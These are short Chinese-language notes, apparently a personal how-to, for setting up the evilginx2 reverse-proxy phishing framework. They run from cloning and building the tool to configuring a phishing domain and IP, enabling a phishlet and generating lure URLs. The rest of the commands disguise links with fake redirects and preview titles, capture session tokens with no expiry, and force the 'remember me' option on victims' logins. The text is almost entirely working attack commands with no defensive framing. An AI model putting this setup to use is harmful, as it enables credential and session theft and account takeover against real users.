下載並安裝啟動evilginx主程式
git clone https://github.com/kgretzky/evilginx2
make
sudo ./evilginx -p ../phishlets/
配置域名DNS
在evilginx配置域名
config domain sex666vr.com
配置evil釣魚主機名 phishlets hostname name sex666vr.com
配置evilginx IP的中
config ipv4 35.194.170.251
啟動指定模板
phishlets enable name
查看模板啟動狀態
phishlets
添加路由
lures create namecheap
lures
取得釣魚網站地址
lures get-url 0
訪問釣魚頁面
更改默認未授權跳轉頁面
/root/.evilginx
在此路徑下更改默認域名及相關設定
調整path
lures edit 0 path /download/123
調整hostname
lures edit 0 hostname timmy.test.test.com
調整重定向跳轉地址
lures edit 0 redirect_url truewebsit.com
調整釣魚連接title
lures edit 0 og_title = true_website
調整釣魚連接圖標
lures edit 0 og_url = 'http:123.com"
調整auth-token 抓取沒有到期時間的token
token ['token:always']
還有個功能自動保持登入,可以預先幫用戶勾選
phlist 加入force_post
username password 用search來
rememberme :1 force
type post
Comments